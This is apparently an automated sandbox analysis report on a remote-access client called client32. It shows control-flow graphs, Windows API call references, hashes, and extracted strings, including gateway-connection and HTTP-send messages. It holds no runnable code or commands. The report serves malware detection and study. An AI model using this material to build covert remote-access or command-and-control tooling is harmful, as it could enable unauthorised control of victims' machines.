                                                                                                                                        • Opcode ID: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
                                                                                                                                        • Instruction ID: eeaa44aaf805afce620a012973528e55005956dd55c3add89e5b481fbdd40cac
                                                                                                                                        • Opcode Fuzzy Hash: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
                                                                                                                                        • Instruction Fuzzy Hash: FCB1F674A1122A9FDB02DFE1CD88BADFBB5AB8472EF904138E525972C8F7745040CB56
                                                                                                                                        Function 1102D679 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1599 1102d679 1600 1102d680-1102d691 1599->1600 1600->1600 1601 1102d693 1600->1601 1602 1102d7d4-1102d7ed call 1113f130 1601->1602 1605 1102d7f3-1102d7f5 1602->1605 1606 1102d670-1102d673 1602->1606 1609 1102d8f3-1102d90d call 111429e0 1605->1609 1610 1102d7fb-1102d801 1605->1610 1607 1102d675-1102d677 1606->1607 1608 1102d698-1102d6a1 1606->1608 1607->1600 1608->1602 1611 1102d6a7-1102d6ae 1608->1611 1634 1102d963-1102d96f call 1102b120 1609->1634 1635 1102d90f-1102d928 call 1105d340 1609->1635 1613 1102d803-1102d812 call 11141430 1610->1613 1614 1102d818-1102d828 1610->1614 1611->1602 1615 1102d7a3-1102d7b8 call 1115f5b7 1611->1615 1616 1102d6b5-1102d6b7 1611->1616 1617 1102d7ba-1102d7cf call 1115f5b7 1611->1617 1618 1102d74a-1102d77d call 1115e091 call 1113e8f0 1611->1618 1619 1102d78b-1102d7a1 call 11160790 1611->1619 1620 1102d73b-1102d745 1611->1620 1621 1102d77f-1102d789 1611->1621 1622 1102d6fc-1102d702 1611->1622 1623 1102d72c-1102d736 1611->1623 1613->1614 1626 1102d82a 1614->1626 1627 1102d82f-1102d84d call 1102c850 1614->1627 1615->1602 1616->1602 1633 1102d6bd-1102d6f7 call 1115e091 call 1113e8f0 call 1102c850 1616->1633 1617->1602 1618->1602 1619->1602 1620->1602 1621->1602 1637 1102d704-1102d718 call 1115f5b7 1622->1637 1638 1102d71d-1102d727 1622->1638 1623->1602 1626->1627 1627->1609 1649 1102d853-1102d878 call 110b6bd0 call 11142a60 1627->1649 1633->1602 1656 1102d971-1102d978 1634->1656 1657 1102d948-1102d94f 1634->1657 1635->1634 1659 1102d92a-1102d93c 1635->1659 1637->1602 1638->1602 1683 1102d883-1102d889 1649->1683 1684 1102d87a-1102d881 1649->1684 1660 1102d955-1102d958 1656->1660 1663 1102d97a-1102d984 1656->1663 1657->1660 1661 1102db5a-1102db7b GetComputerNameA 1657->1661 1659->1634 1679 1102d93e 1659->1679 1665 1102d95a-1102d961 call 110b6bd0 1660->1665 1666 1102d989 1660->1666 1670 1102dbb3-1102dbb9 1661->1670 1671 1102db7d-1102dbb1 call 110278a0 1661->1671 1663->1661 1675 1102d98c-1102da66 call 11027550 call 11027850 call 11027550 * 2 LoadLibraryA GetProcAddress 1665->1675 1666->1675 1676 1102dbbb-1102dbc0 1670->1676 1677 1102dbef-1102dc02 call 11160790 1670->1677 1671->1670 1703 1102dc07-1102dc13 1671->1703 1734 1102db2a-1102db32 SetLastError 1675->1734 1735 1102da6c-1102da83 1675->1735 1682 1102dbc6-1102dbca 1676->1682 1700 1102ddf7-1102de1a 1677->1700 1679->1657 1691 1102dbe6-1102dbe8 1682->1691 1692 1102dbcc-1102dbce 1682->1692 1687 1102d88b-1102d892 call 110279d0 1683->1687 1688 1102d8e9 1683->1688 1684->1609 1687->1688 1709 1102d894-1102d8c6 1687->1709 1688->1609 1698 1102dbeb-1102dbed 1691->1698 1695 1102dbe2-1102dbe4 1692->1695 1696 1102dbd0-1102dbd6 1692->1696 1695->1698 1696->1691 1704 1102dbd8-1102dbe0 1696->1704 1698->1677 1698->1703 1713 1102de42-1102de4a 1700->1713 1714 1102de1c-1102de22 1700->1714 1706 1102dc15-1102dc2a call 110b6bd0 call 11029870 1703->1706 1707 1102dc2c-1102dc3f call 11080b10 1703->1707 1704->1682 1704->1695 1740 1102dc83-1102dc9c call 11080b10 1706->1740 1725 1102dc41-1102dc64 1707->1725 1726 1102dc66-1102dc68 1707->1726 1727 1102d8d0-1102d8df call 110f3da0 1709->1727 1728 1102d8c8-1102d8ce 1709->1728 1720 1102de5c-1102dee8 call 1115e091 * 2 call 11142a60 * 2 GetCurrentProcessId call 110ebb00 call 11027900 call 11142a60 call 1115e4d1 1713->1720 1721 1102de4c-1102de59 call 1113f120 call 1115e091 1713->1721 1714->1713 1718 1102de24-1102de3d call 1102cde0 1714->1718 1718->1713 1721->1720 1725->1740 1737 1102dc70-1102dc81 1726->1737 1730 1102d8e2-1102d8e4 call 1102cde0 1727->1730 1728->1727 1728->1730 1730->1688 1742 1102daf3-1102daff 1734->1742 1735->1742 1758 1102da85-1102da8e 1735->1758 1737->1737 1737->1740 1759 1102dca2-1102dd1d call 11142a60 call 110cd950 call 110cf1b0 call 110b6bd0 wsprintfA call 110b6bd0 wsprintfA 1740->1759 1760 1102dddc-1102dde9 call 11160790 1740->1760 1747 1102db42-1102db51 1742->1747 1748 1102db01-1102db0d 1742->1748 1747->1661 1756 1102db53-1102db54 FreeLibrary 1747->1756 1753 1102db1f-1102db23 1748->1753 1754 1102db0f-1102db1d GetProcAddress 1748->1754 1761 1102db34-1102db36 SetLastError 1753->1761 1762 1102db25-1102db28 1753->1762 1754->1753 1756->1661 1758->1742 1763 1102da90-1102dac6 call 11142a60 call 11128350 1758->1763 1799 1102dd33-1102dd49 call 11125f90 1759->1799 1800 1102dd1f-1102dd2e call 110290f0 1759->1800 1777 1102ddec-1102ddf1 CharUpperA 1760->1777 1765 1102db3c 1761->1765 1762->1765 1763->1742 1784 1102dac8-1102daee call 11142a60 call 11027590 1763->1784 1765->1747 1777->1700 1784->1742 1804 1102dd62-1102dd9c call 110ce900 * 2 1799->1804 1805 1102dd4b-1102dd5d call 110ce900 1799->1805 1800->1799 1812 1102ddb2-1102ddda call 11160790 call 110ce4f0 1804->1812 1813 1102dd9e-1102ddad call 110290f0 1804->1813 1805->1804 1812->1777 1813->1812
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102D9E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: $30/10/15 13:45:13 V12.10F4$305090$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                        • API String ID: 1029625771-1136126593
                                                                                                                                        • Opcode ID: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
                                                                                                                                        • Instruction ID: 3410179eeb5a9037d1fa1f4c8bb60b9922e488a50ebb30bdceadca7c29897b10
                                                                                                                                        • Opcode Fuzzy Hash: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
                                                                                                                                        • Instruction Fuzzy Hash: 03C1C375E0026A9FDB22DF948C90BEDF7B9BB44308F9044EDE559A7240E7706E80CB61
                                                                                                                                        Function 688F63C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181libraryloadersleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1819 688f63c0-688f6402 call 68914710 EnterCriticalSection InterlockedDecrement 1822 688f65ed-688f6608 LeaveCriticalSection call 689128e1 1819->1822 1823 688f6408-688f641f EnterCriticalSection 1819->1823 1824 688f64da-688f64e0 1823->1824 1825 688f6425-688f6431 1823->1825 1830 688f65bd-688f65e8 call 68911c50 LeaveCriticalSection 1824->1830 1831 688f64e6-688f64f0 shutdown 1824->1831 1828 688f6443-688f6447 1825->1828 1829 688f6433-688f6441 GetProcAddress 1825->1829 1832 688f644e-688f6450 SetLastError 1828->1832 1833 688f6449-688f644c 1828->1833 1829->1828 1830->1822 1834 688f650a-688f652d timeGetTime #16 1831->1834 1835 688f64f2-688f6507 GetLastError call 688f30a0 1831->1835 1837 688f6456-688f6465 1832->1837 1833->1837 1839 688f652f 1834->1839 1840 688f656c-688f656e 1834->1840 1835->1834 1844 688f6477-688f647b 1837->1844 1845 688f6467-688f6475 GetProcAddress 1837->1845 1847 688f6551-688f656a #16 1839->1847 1848 688f6531 1839->1848 1842 688f6570-688f657b closesocket 1840->1842 1849 688f657d-688f658a WSAGetLastError 1842->1849 1850 688f65b6 1842->1850 1851 688f647d-688f6480 1844->1851 1852 688f6482-688f6484 SetLastError 1844->1852 1845->1844 1847->1839 1847->1840 1848->1847 1853 688f6533-688f653e GetLastError 1848->1853 1854 688f658c-688f658e Sleep 1849->1854 1855 688f6594-688f6598 1849->1855 1850->1830 1856 688f648a-688f6499 1851->1856 1852->1856 1853->1840 1857 688f6540-688f6547 timeGetTime 1853->1857 1854->1855 1855->1842 1858 688f659a-688f659c 1855->1858 1860 688f64ab-688f64af 1856->1860 1861 688f649b-688f64a9 GetProcAddress 1856->1861 1857->1840 1862 688f6549-688f654b Sleep 1857->1862 1858->1850 1865 688f659e-688f65b3 GetLastError call 688f30a0 1858->1865 1863 688f64c3-688f64d5 SetLastError 1860->1863 1864 688f64b1-688f64be 1860->1864 1861->1860 1862->1847 1863->1830 1864->1830 1865->1850
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000000,?,00000000,?,688FD77B,00000000), ref: 688F63E8
                                                                                                                                        • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 688F63FA
                                                                                                                                        • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,688FD77B,00000000), ref: 688F6412
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F643B
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,688FD77B,00000000), ref: 688F6450
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F646F
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,688FD77B,00000000), ref: 688F6484
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F64A3
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,688FD77B,00000000), ref: 688F64C5
                                                                                                                                        • shutdown.WSOCK32(?,00000001,?,00000000,?,688FD77B,00000000), ref: 688F64E9
                                                                                                                                        • GetLastError.KERNEL32(?,00000001,?,00000000,?,688FD77B,00000000), ref: 688F64F2
                                                                                                                                        • timeGetTime.WINMM(?,00000001,?,00000000,?,688FD77B,00000000), ref: 688F6510
                                                                                                                                        • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F6526
                                                                                                                                        • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F6533
                                                                                                                                        • timeGetTime.WINMM(?,00000000,?,688FD77B,00000000), ref: 688F6540
                                                                                                                                        • Sleep.KERNEL32(00000001,?,00000000,?,688FD77B,00000000), ref: 688F654B
                                                                                                                                        • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F6563
                                                                                                                                        • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F6574
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F657D
                                                                                                                                        • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F658E
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F659E
                                                                                                                                        • _memset.LIBCMT ref: 688F65C8
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,688FD77B,00000000), ref: 688F65D7
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,00000000,?,688FD77B,00000000), ref: 688F65F2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                                                        • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                                        • API String ID: 3764039262-2631155478
                                                                                                                                        • Opcode ID: 5c078b11553b888c01c370bfd7d5f276d3ee81a15f80224ebe2d0a924e91fc53
                                                                                                                                        • Instruction ID: dde2406876a8e83c0fbdedb7ae9d955062f90e98ca318415a9f1f64cf82324c9
                                                                                                                                        • Opcode Fuzzy Hash: 5c078b11553b888c01c370bfd7d5f276d3ee81a15f80224ebe2d0a924e91fc53
                                                                                                                                        • Instruction Fuzzy Hash: 2951D675648704AFD730EF68CC84B5A73B9BF99354F900A24E656D7680DB70E841CB61
                                                                                                                                        Function 688F98D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1869 688f98d0-688f9932 1870 688f9956-688f995e 1869->1870 1871 688f9934-688f9955 call 688f30a0 call 689128e1 1869->1871 1873 688f9ac5-688f9acc 1870->1873 1874 688f9964-688f9979 call 689128f0 1870->1874 1875 688f9ace-688f9adb 1873->1875 1876 688f9b19-688f9b1d 1873->1876 1874->1873 1887 688f997f-688f9994 call 68914330 1874->1887 1880 688f9add-688f9af6 wsprintfA 1875->1880 1881 688f9af8-688f9b07 wsprintfA 1875->1881 1882 688f9b1f-688f9b26 1876->1882 1883 688f9b4b-688f9b70 GetTickCount InterlockedExchange EnterCriticalSection 1876->1883 1888 688f9b0a-688f9b16 call 688f52b0 1880->1888 1881->1888 1882->1883 1889 688f9b28-688f9b41 call 688f77b0 1882->1889 1885 688f9b9c-688f9ba1 1883->1885 1886 688f9b72-688f9b9b LeaveCriticalSection call 688f30a0 call 689128e1 1883->1886 1893 688f9bfb-688f9c05 1885->1893 1894 688f9ba3-688f9bd0 call 688f4dd0 1885->1894 1887->1873 1905 688f999a-688f99af call 689128f0 1887->1905 1888->1876 1889->1883 1910 688f9b43-688f9b45 1889->1910 1901 688f9c3b-688f9c47 1893->1901 1902 688f9c07-688f9c17 1893->1902 1916 688f9d4b-688f9d6c LeaveCriticalSection call 689077e0 1894->1916 1917 688f9bd6-688f9bf6 WSAGetLastError call 688f30a0 1894->1917 1906 688f9c50-688f9c5a 1901->1906 1908 688f9c19-688f9c1d 1902->1908 1909 688f9c20-688f9c22 1902->1909 1905->1873 1927 688f99b5-688f99f1 1905->1927 1914 688f9d2e-688f9d3b call 688f30a0 1906->1914 1915 688f9c60-688f9c65 1906->1915 1908->1909 1918 688f9c1f 1908->1918 1909->1901 1911 688f9c24-688f9c36 call 688f46c0 1909->1911 1910->1883 1911->1901 1932 688f9d45 1914->1932 1922 688f9c67-688f9c6b 1915->1922 1923 688f9c71-688f9c9a send 1915->1923 1936 688f9d6e-688f9d72 InterlockedIncrement 1916->1936 1937 688f9d78-688f9d8a call 689128e1 1916->1937 1917->1916 1918->1909 1922->1914 1922->1923 1928 688f9c9c-688f9c9f 1923->1928 1929 688f9cf1-688f9d0f call 688f30a0 1923->1929 1933 688f99f7-688f99ff 1927->1933 1934 688f9cbe-688f9cce WSAGetLastError 1928->1934 1935 688f9ca1-688f9cac 1928->1935 1929->1932 1932->1916 1940 688f9a05-688f9a08 1933->1940 1941 688f9aa3-688f9ac2 call 688f30a0 1933->1941 1943 688f9d11-688f9d2c call 688f30a0 1934->1943 1944 688f9cd0-688f9ce9 timeGetTime Sleep 1934->1944 1935->1932 1942 688f9cb2-688f9cbc 1935->1942 1936->1937 1948 688f9a0e 1940->1948 1949 688f9a0a-688f9a0c 1940->1949 1941->1873 1942->1944 1943->1932 1944->1906 1950 688f9cef 1944->1950 1954 688f9a14-688f9a1d 1948->1954 1949->1954 1950->1932 1955 688f9a1f-688f9a22 1954->1955 1956 688f9a8d-688f9a8e 1954->1956 1957 688f9a26-688f9a35 1955->1957 1958 688f9a24 1955->1958 1956->1941 1959 688f9a37-688f9a3a 1957->1959 1960 688f9a90-688f9a93 1957->1960 1958->1957 1961 688f9a3e-688f9a4d 1959->1961 1962 688f9a3c 1959->1962 1963 688f9a9d 1960->1963 1964 688f9a4f-688f9a52 1961->1964 1965 688f9a95-688f9a98 1961->1965 1962->1961 1963->1941 1966 688f9a56-688f9a65 1964->1966 1967 688f9a54 1964->1967 1965->1963 1968 688f9a9a 1966->1968 1969 688f9a67-688f9a6a 1966->1969 1967->1966 1968->1963 1970 688f9a6e-688f9a85 1969->1970 1971 688f9a6c 1969->1971 1970->1933 1972 688f9a8b 1970->1972 1971->1970 1972->1941
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strncmp
                                                                                                                                        • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                                        • API String ID: 909875538-2848211065
                                                                                                                                        • Opcode ID: 123840faa9e8efcda33684dcddd627202ced4133cd3ba9de48db8a8e09353959
                                                                                                                                        • Instruction ID: 880c00f872e8ad3f5935cf0b4977df4ad80d07a322ffb67a06d7093f0a3afb03
                                                                                                                                        • Opcode Fuzzy Hash: 123840faa9e8efcda33684dcddd627202ced4133cd3ba9de48db8a8e09353959
                                                                                                                                        • Instruction Fuzzy Hash: ABD1E775A042299FDB20CF68CC84BEDB774AF4A348F8045E9D85D9B242D731DA86CF51
                                                                                                                                        Function 11028290 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1973 11028290-110282ad 1974 110282b3-110282e2 1973->1974 1975 11028978-1102897f 1973->1975 1976 11028370-110283b8 GetModuleFileNameA call 1115f9c0 call 1116076b 1974->1976 1977 110282e8-110282ee 1974->1977 1978 11028991-11028995 1975->1978 1979 11028981-1102898a 1975->1979 1993 110283bd 1976->1993 1981 110282f0-110282f8 1977->1981 1983 11028997-110289a9 call 1115e4d1 1978->1983 1984 110289aa-110289be call 1115e4d1 1978->1984 1979->1978 1982 1102898c 1979->1982 1981->1981 1987 110282fa-11028300 1981->1987 1982->1978 1992 11028303-11028308 1987->1992 1992->1992 1994 1102830a-11028314 1992->1994 1995 110283c0-110283ca 1993->1995 1996 11028331-11028337 1994->1996 1997 11028316-1102831d 1994->1997 1999 110283d0-110283d3 1995->1999 2000 1102896f-11028977 1995->2000 1998 11028338-1102833e 1996->1998 2001 11028320-11028326 1997->2001 1998->1998 2002 11028340-1102836e call 1116076b 1998->2002 1999->2000 2003 110283d9-110283e7 call 11026500 1999->2003 2000->1975 2001->2001 2004 11028328-1102832e 2001->2004 2002->1995 2009 110288f5-1102890a call 11160535 2003->2009 2010 110283ed-11028400 call 1115f5b7 2003->2010 2004->1996 2009->2000 2017 11028910-1102896a 2009->2017 2015 11028402-11028405 2010->2015 2016 1102840b-11028433 call 11026370 call 11026500 2010->2016 2015->2009 2015->2016 2016->2009 2022 11028439-11028456 call 110265f0 call 11026500 2016->2022 2017->2000 2027 11028865-1102886c 2022->2027 2028 1102845c 2022->2028 2029 11028892-11028899 2027->2029 2030 1102886e-11028871 2027->2030 2031 11028460-11028480 call 11026370 2028->2031 2033 110288b1-110288b8 2029->2033 2034 1102889b-110288a1 2029->2034 2030->2029 2032 11028873-1102887a 2030->2032 2041 11028482-11028485 2031->2041 2042 110284b6-110284b9 2031->2042 2039 11028880-11028890 2032->2039 2036 110288ba-110288c5 2033->2036 2037 110288c8-110288cf 2033->2037 2040 110288a7-110288af 2034->2040 2036->2037 2043 110288d1-110288db 2037->2043 2044 110288de-110288e5 2037->2044 2039->2029 2039->2039 2040->2033 2040->2040 2045 11028487-1102848e 2041->2045 2046 1102849e-110284a1 2041->2046 2048 1102884e-1102885f call 11026500 2042->2048 2049 110284bf-110284d2 call 111608d0 2042->2049 2043->2044 2044->2009 2047 110288e7-110288f2 2044->2047 2050 11028494-1102849c 2045->2050 2046->2048 2051 110284a7-110284b1 2046->2051 2047->2009 2048->2027 2048->2031 2049->2048 2056 110284d8-110284f4 call 11160e4e 2049->2056 2050->2046 2050->2050 2051->2048 2059 110284f6-110284fc 2056->2059 2060 1102850f-11028525 call 11160e4e 2056->2060 2062 11028500-11028508 2059->2062 2065 11028527-1102852d 2060->2065 2066 1102853f-11028555 call 11160e4e 2060->2066 2062->2062 2064 1102850a 2062->2064 2064->2048 2067 11028530-11028538 2065->2067 2071 11028557-1102855d 2066->2071 2072 1102856f-11028585 call 11160e4e 2066->2072 2067->2067 2069 1102853a 2067->2069 2069->2048 2073 11028560-11028568 2071->2073 2077 11028587-1102858d 2072->2077 2078 1102859f-110285b5 call 11160e4e 2072->2078 2073->2073 2075 1102856a 2073->2075 2075->2048 2079 11028590-11028598 2077->2079 2083 110285b7-110285bd 2078->2083 2084 110285cf-110285e5 call 11160e4e 2078->2084 2079->2079 2081 1102859a 2079->2081 2081->2048 2085 110285c0-110285c8 2083->2085 2089 110285e7-110285ed 2084->2089 2090 110285ff-11028615 call 11160e4e 2084->2090 2085->2085 2087 110285ca 2085->2087 2087->2048 2091 110285f0-110285f8 2089->2091 2095 11028617-1102861d 2090->2095 2096 1102862f-11028645 call 11160e4e 2090->2096 2091->2091 2094 110285fa 2091->2094 2094->2048 2097 11028620-11028628 2095->2097 2101 11028647-1102864d 2096->2101 2102 1102865f-11028675 call 11160e4e 2096->2102 2097->2097 2099 1102862a 2097->2099 2099->2048 2103 11028650-11028658 2101->2103 2107 11028677-1102867d 2102->2107 2108 1102868f-110286a5 call 11160e4e 2102->2108 2103->2103 2105 1102865a 2103->2105 2105->2048 2110 11028680-11028688 2107->2110 2113 110286a7-110286ad 2108->2113 2114 110286bf-110286d5 call 11160e4e 2108->2114 2110->2110 2112 1102868a 2110->2112 2112->2048 2115 110286b0-110286b8 2113->2115 2119 110286d7-110286dd 2114->2119 2120 110286ef-11028705 call 11160e4e 2114->2120 2115->2115 2117 110286ba 2115->2117 2117->2048 2121 110286e0-110286e8 2119->2121 2125 11028726-1102873c call 11160e4e 2120->2125 2126 11028707-1102870d 2120->2126 2121->2121 2123 110286ea 2121->2123 2123->2048 2131 11028753-11028769 call 11160e4e 2125->2131 2132 1102873e 2125->2132 2127 11028717-1102871f 2126->2127 2127->2127 2129 11028721 2127->2129 2129->2048 2137 11028780-11028796 call 11160e4e 2131->2137 2138 1102876b 2131->2138 2133 11028744-1102874c 2132->2133 2133->2133 2135 1102874e 2133->2135 2135->2048 2143 110287b7-110287cd call 11160e4e 2137->2143 2144 11028798-1102879e 2137->2144 2139 11028771-11028779 2138->2139 2139->2139 2142 1102877b 2139->2142 2142->2048 2149 110287ef-11028805 call 11160e4e 2143->2149 2150 110287cf-110287df 2143->2150 2145 110287a8-110287b0 2144->2145 2145->2145 2147 110287b2 2145->2147 2147->2048 2155 11028807-1102880d 2149->2155 2156 1102881c-11028832 call 11160e4e 2149->2156 2151 110287e0-110287e8 2150->2151 2151->2151 2153 110287ea 2151->2153 2153->2048 2158 11028810-11028818 2155->2158 2156->2048 2161 11028834-1102883a 2156->2161 2158->2158 2160 1102881a 2158->2160 2160->2048 2162 11028844-1102884c 2161->2162 2162->2048 2162->2162
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74A91370,?,0000001A), ref: 1102837D
                                                                                                                                        • _strrchr.LIBCMT ref: 1102838C
                                                                                                                                          • Part of subcall function 11160E4E: __stricmp_l.LIBCMT ref: 11160E8B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
